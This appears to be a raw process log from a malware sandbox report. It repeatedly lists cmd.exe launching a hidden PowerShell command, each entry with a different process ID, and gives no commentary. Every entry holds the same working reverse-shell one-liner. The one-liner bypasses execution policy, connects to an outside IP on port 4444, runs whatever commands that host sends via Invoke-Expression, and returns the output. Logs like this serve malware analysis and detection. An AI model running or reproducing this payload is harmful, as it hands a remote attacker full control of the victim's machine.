C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2560
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1004
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4984
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1144
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3748
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4472
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5036
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1420
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2228
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4596
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5000
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1828
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4512
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1292
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2320
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3344
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3760
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3276
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4992
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4704
-
-
